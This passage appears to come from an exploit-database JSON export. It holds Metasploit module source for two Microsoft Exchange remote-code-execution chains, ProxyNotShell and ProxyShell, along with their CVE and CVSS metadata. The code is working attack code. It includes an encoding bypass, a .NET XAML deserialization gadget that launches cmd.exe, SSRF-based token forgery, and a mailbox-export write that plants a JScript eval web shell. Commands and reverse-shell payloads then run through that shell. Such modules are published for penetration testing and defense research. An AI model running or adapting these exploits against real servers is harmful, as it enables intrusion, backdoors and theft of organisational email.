\n'Type' => :windows_dropper \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyNotShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), \nOptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) \n]) \n \nregister_advanced_options([ \nOptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 
'IBM037v1', %w[IBM037v1 none]]) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \n# actually run the powershell cmdlet and see if it works, this will fail if: \n# * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) \n# * the exchange emergency mitigation service M1 rule is in place \nreturn CheckCode::Safe unless execute_powershell('Get-Mailbox') \n \nCheckCode::Vulnerable \nrescue Msf::Exploit::Failed => e \nCheckCode::Safe(e.to_s) \nend \n \ndef ibm037(string) \nstring.encode('IBM037').force_encoding('ASCII-8BIT') \nend \n \ndef send_http(method, uri, opts = {}) \nopts[:authentication] = { \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'preferred_auth' => 'NTLM' \n} \n \nif uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' \nuri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' 
+ @ssrf_email)}\" \nopts[:headers] = { \n'X-Up-Devcap-Post-Charset' => 'IBM037', \n# technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 \n'User-Agent' => \"UP #{datastore['UserAgent']}\" \n} \nelse \nuri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\" \nend \n \nsuper(method, uri, opts) \nend \n \ndef exploit \n# if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not \n# work on Exchange Server 2016 \nif datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) \nvprint_status(\"Detected Exchange version: #{version}\") \nif version < Rex::Version.new('15.2') \nfail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') \nend \nend \n \n@ssrf_email ||= Faker::Internet.email \n \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nwhen :windows_dropper \nexecute_cmdstager({ linemax: 7_500 }) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nxaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<ResourceDictionary \nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" \nxmlns:System=\"clr-namespace:System;assembly=mscorlib\" \nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\"> \n<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\"> \n<ObjectDataProvider.MethodParameters> \n<System:String>cmd.exe</System:String> \n<System:String>/c #{cmd.encode(xml: :text)}</System:String> \n</ObjectDataProvider.MethodParameters> \n</ObjectDataProvider> \n</ResourceDictionary> \nXAML \n \nidentity = 
Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<Obj N=\"V\" RefId=\"14\"> \n<TN RefId=\"1\"> \n<T>System.ServiceProcess.ServiceController</T> \n<T>System.Object</T> \n</TN> \n<ToString>Object</ToString> \n<Props> \n<S N=\"Name\">Type</S> \n<Obj N=\"TargetTypeForDeserialization\"> \n<TN RefId=\"1\"> \n<T>System.Exception</T> \n<T>System.Object</T> \n</TN> \n<MS> \n<BA N=\"SerializationData\"> \n#{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} \n</BA> \n</MS> \n</Obj> \n</Props> \n<S> \n<![CDATA[#{xaml}]]> \n</S> \n</Obj> \nIDENTITY \n \nexecute_powershell('Get-Mailbox', args: [ \n{ name: '-Identity', value: identity } \n]) \nend \nend \n \nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream \ninclude Msf::Util::DotNetDeserialization \n \ndef self.generate \nfrom_values([ \nTypes::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), \nTypes::RecordValues::SystemClassWithMembersAndTypes.from_member_values( \nclass_info: Types::General::ClassInfo.new( \nobj_id: 1, \nname: 'System.UnitySerializationHolder', \nmember_names: %w[Data UnityType AssemblyName] \n), \nmember_type_info: Types::General::MemberTypeInfo.new( \nbinary_type_enums: %i[String Primitive String], \nadditional_infos: [ 8 ] \n), \nmember_values: [ \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 2, \nstring: 'System.Windows.Markup.XamlReader' \n)), \n4, \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 3, \nstring: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' \n)) \n] \n), \nTypes::RecordValues::MessageEnd.new \n]) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170066/exchange_proxynotshell_rce.rb.txt"}, {"lastseen": "2021-08-20T15:47:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "PACKETSTORM:163895", "href": "https://packetstormsecurity.com/files/163895/Microsoft-Exchange-ProxyShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'winrm' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyShell RCE', \n'Description' => %q{ \nThis module exploits a vulnerability chain in Microsoft Exchange Server that \nallows an attacker to bypass the 
authentication via the pre-auth path confusion (CVE-2021-34473), impersonate an \narbitrary user on the PowerShell backend (CVE-2021-34523) and write an arbitrary file post-auth (CVE-2021-31207) to achieve \nRCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability chain, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, \nExchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, \nExchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery \n'Jang (@testanull)', # Vulnerability analysis \n'PeterJson', # Vulnerability analysis \n'brandonshi123', # Vulnerability analysis \n'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template \n'Spencer McIntyre', # Metasploit module \n'wvu' # Testing \n], \n'References' => [ \n[ 'CVE', '2021-34473' ], \n[ 'CVE', '2021-34523' ], \n[ 'CVE', '2021-31207' ], \n[ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ], \n[ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ], \n[ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ] \n], \n'DisclosureDate' => '2021-04-06', # pwn2own 2021 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { 
\n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]), \n]) \n \nregister_advanced_options([ \nOptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']), \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \nCheckCode::Vulnerable \nend \n \ndef cmd_windows_generic? 
\ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef request_autodiscover(_server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n'/autodiscover/autodiscover.xml', \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? 
\n \n{ server: server, legacy_dn: legacy_dn } \nend \n \ndef request_fqdn \nntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nreceived = send_request_raw( \n'method' => 'RPC_IN_DATA', \n'uri' => normalize_uri('rpc', 'rpcproxy.dll'), \n'headers' => { \n'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\" \n} \n) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nif received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i) \nhash = received['WWW-Authenticate'].split('NTLM ')[1] \nmessage = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) \ndns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] \n \nreturn dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase \nend \n \nfail_with(Failure::NotFound, 'No Backend server was found') \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(_server_name, legacy_dn) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n'/mapi/emsmdb', \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response&.code == 200 \nsid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. 
\ndef run_cve_2021_34473 \nif datastore['BackendServerName'] && !datastore['BackendServerName'].empty? \nserver_name = datastore['BackendServerName'] \nprint_status(\"Internal server name forced to: #{server_name}\") \nelse \nprint_status('Retrieving backend FQDN over RPC request') \nserver_name = request_fqdn \nprint_status(\"Internal server name: #{server_name}\") \nend \n@backend_server_name = server_name \n \n# get information via an autodiscover request. \nprint_status('Sending autodiscover request') \nautodiscover = request_autodiscover(server_name) \n \nprint_status(\"Server: #{autodiscover[:server]}\") \nprint_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\") \n \n# get the user UID using mapi request. \nprint_status('Sending mapi request') \nmailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn]) \nprint_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\") \n \nsend_payload(mailbox_user_sid) \n@common_access_token = build_token(mailbox_user_sid) \nend \n \ndef send_http(method, uri, opts = {}) \nssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nunless opts[:cookie] == :none \nopts[:cookie] = \"Email=#{ssrf}\" \nend \n \nrequest = { \n'method' => method, \n'uri' => \"/#{ssrf}#{uri}\", \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype], \n'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' } \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? 
\n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef send_payload(user_sid) \n@shell_input_name = rand_text_alphanumeric(8..12) \n@draft_subject = rand_text_alphanumeric(8..12) \npayload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\")) \nfile_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\" \nenvelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject) \n \nsend_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8') \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \ndatastore['IISWritePath'].gsub('\\\\', '/') \nelse \ndatastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nend \n \ndef build_token(sid) \nuint8_tlv = proc do |type, value| \ntype + [value.length].pack('C') + value \nend \n \ntoken = uint8_tlv.call('V', \"\\x00\") \ntoken << uint8_tlv.call('T', 'Windows') \ntoken << \"\\x43\\x00\" \ntoken << uint8_tlv.call('A', 'Kerberos') \ntoken << uint8_tlv.call('L', datastore['EMAIL']) \ntoken << uint8_tlv.call('U', sid) \n \n# group data for S-1-5-32-544 \ntoken << 
\"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\" \nRex::Text.encode_base64(token) \nend \n \ndef execute_powershell(cmdlet, args: []) \nwinrm = SSRFWinRMConnection.new({ \nendpoint: full_uri('PowerShell/'), \ntransport: :ssrf, \nssrf_proc: proc do |method, uri, opts| \nuri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\" \nuri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nopts[:cookie] = :none \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>}, \n\"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\" \n) \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>}, \n\"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\" \n) \nsend_http(method, uri, opts) \nend \n}) \n \nwinrm.shell(:powershell) do |shell| \nshell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH) \nshell.extend(SSRFWinRMConnection::PowerShell) \nshell.run({ cmdlet: cmdlet, args: args }) \nend \nend \n \ndef exploit \n@ssrf_email ||= Faker::Internet.email \nprint_status('Attempt to exploit for CVE-2021-34473') \nrun_cve_2021_34473 \n \npowershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none) \nfail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200 \n \nprint_status('Assigning the \\'Mailbox Import Export\\' role') \nexecute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } 
]) \n \n@shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\" \nif datastore['UseAlternatePath'] \nunc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nelse \nunc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nend \n \nnormal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\') \nprint_status(\"Writing to: #{normal_path}\") \nregister_file_for_cleanup(normal_path) \n \n@export_name = rand_text_alphanumeric(8..12) \nexecute_powershell('New-MailboxExportRequest', args: [ \n{ name: '-Name', value: @export_name }, \n{ name: '-Mailbox', value: datastore['EMAIL'] }, \n{ name: '-IncludeFolders', value: '#Drafts#' }, \n{ name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" }, \n{ name: '-ExcludeDumpster' }, \n{ name: '-FilePath', value: unc_path } \n]) \n \nprint_status('Waiting for the export request to complete...') \n30.times do \nif execute_command('whoami')&.code == 200 \nprint_good('The mailbox export request has completed') \nbreak \nend \nsleep 5 \nend \n \nprint_status('Triggering the payload') \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? 
\nexecute_command(payload.encoded) \nelse \nboundary = rand_text_alphanumeric(8..12) \nresponse = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\") \n \nprint_warning('Dumping command output in response') \nif response.body =~ /START#{boundary}(.*)END#{boundary}/m \nprint_line(Regexp.last_match(1).strip) \nelse \nprint_error('Empty response, no command output') \nend \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \ndef cleanup \nsuper \nreturn unless @common_access_token && @export_name \n \nprint_status('Removing the mailbox export request') \nexecute_powershell('Remove-MailboxExportRequest', args: [ \n{ name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" }, \n{ name: '-Confirm', value: false } \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \nif !cmd_windows_generic? 
\ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\" \nelse \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nend \n \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @shell_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@shell_input_name}=#{cmd}\" \n) \nend \nend \n \nclass PstEncoding \nENCODE_TABLE = [ \n71, 241, 180, 230, 11, 106, 114, 72, \n133, 78, 158, 235, 226, 248, 148, 83, \n224, 187, 160, 2, 232, 90, 9, 171, \n219, 227, 186, 198, 124, 195, 16, 221, \n57, 5, 150, 48, 245, 55, 96, 130, \n140, 201, 19, 74, 107, 29, 243, 251, \n143, 38, 151, 202, 145, 23, 1, 196, \n50, 45, 110, 49, 149, 255, 217, 35, \n209, 0, 94, 121, 220, 68, 59, 26, \n40, 197, 97, 87, 32, 144, 61, 131, \n185, 67, 190, 103, 210, 70, 66, 118, \n192, 109, 91, 126, 178, 15, 22, 41, \n60, 169, 3, 84, 13, 218, 93, 223, \n246, 183, 199, 98, 205, 141, 6, 211, \n105, 92, 134, 214, 20, 247, 165, 102, \n117, 172, 177, 233, 69, 33, 112, 12, \n135, 159, 116, 164, 34, 76, 111, 191, \n31, 86, 170, 46, 179, 120, 51, 80, \n176, 163, 146, 188, 207, 25, 28, 167, \n99, 203, 30, 77, 62, 75, 27, 155, \n79, 231, 240, 238, 173, 58, 181, 89, \n4, 234, 64, 85, 37, 81, 229, 122, \n137, 56, 104, 82, 123, 252, 39, 174, \n215, 189, 250, 7, 244, 204, 142, 95, \n239, 53, 156, 132, 43, 21, 213, 119, \n52, 73, 182, 18, 10, 127, 113, 136, \n253, 157, 24, 65, 125, 147, 216, 88, \n44, 206, 254, 36, 175, 222, 184, 54, \n200, 161, 128, 166, 153, 152, 168, 47, \n14, 129, 101, 115, 228, 194, 162, 138, \n212, 225, 17, 208, 8, 139, 42, 242, \n237, 154, 100, 63, 193, 108, 249, 236 \n].freeze \n \ndef self.encode(data) \nencoded = '' \ndata.each_char do |char| \nencoded << ENCODE_TABLE[char.ord].chr \nend \nencoded \nend \nend \n \nclass XMLTemplate \ndef self.render(template_name, context = nil) \nfile_path = ::File.join(::Msf::Config.data_directory, 
'exploits', 'proxyshell', \"#{template_name}.xml.erb\") \ntemplate = ::File.binread(file_path) \ncase context \nwhen Hash \nb = binding \nlocals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" } \nb.eval(locals.join) \nelse \nraise ArgumentError \nend \nb.eval(Erubi::Engine.new(template).src) \nend \nend \n \nclass SSRFWinRMConnection < WinRM::Connection \nclass MessageFactory < WinRM::PSRP::MessageFactory \ndef self.create_pipeline_message(runspace_pool_id, pipeline_id, command) \nWinRM::PSRP::Message.new( \nrunspace_pool_id, \nWinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline], \nXMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]), \npipeline_id \n) \nend \nend \n \n# we have to define this class so we can define our own transport factory that provides one backed by the SSRF \n# vulnerability \nclass TransportFactory < WinRM::HTTP::TransportFactory \nclass HttpSsrf < WinRM::HTTP::HttpTransport \n# rubocop:disable Lint/ \ndef initialize(endpoint, options) \n@endpoint = endpoint.is_a?(String) ? 
URI.parse(endpoint) : endpoint \n@ssrf_proc = options[:ssrf_proc] \nend \n \ndef send_request(message) \nresp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message }) \nWinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml \nend \nend \n \ndef create_transport(connection_opts) \nraise NotImplementedError unless connection_opts[:transport] == :ssrf \n \nsuper \nend \n \nprivate \n \ndef init_ssrf_transport(opts) \nHttpSsrf.new(opts[:endpoint], opts) \nend \nend \n \nmodule PowerShell \ndef send_command(command, _arguments) \ncommand_id = SecureRandom.uuid.to_s.upcase \nmessage = MessageFactory.create_pipeline_message(@runspace_id, command_id, command) \nfragmenter.fragment(message) do |fragment| \ncommand_args = [connection_opts, shell_id, command_id, fragment] \nif fragment.start_fragment \nresp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build) \ncommand_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text \nelse \ntransport.send_request(WinRM::WSMV::SendData.new(*command_args).build) \nend \nend \n \ncommand_id \nend \nend \n \ndef initialize(connection_opts) \n# these have to be set to truthy values to pass the option validation, but they're not actually used because hax \nconnection_opts.merge!({ user: :ssrf, password: :ssrf }) \nsuper(connection_opts) \nend \n \ndef transport \n@transport ||= begin 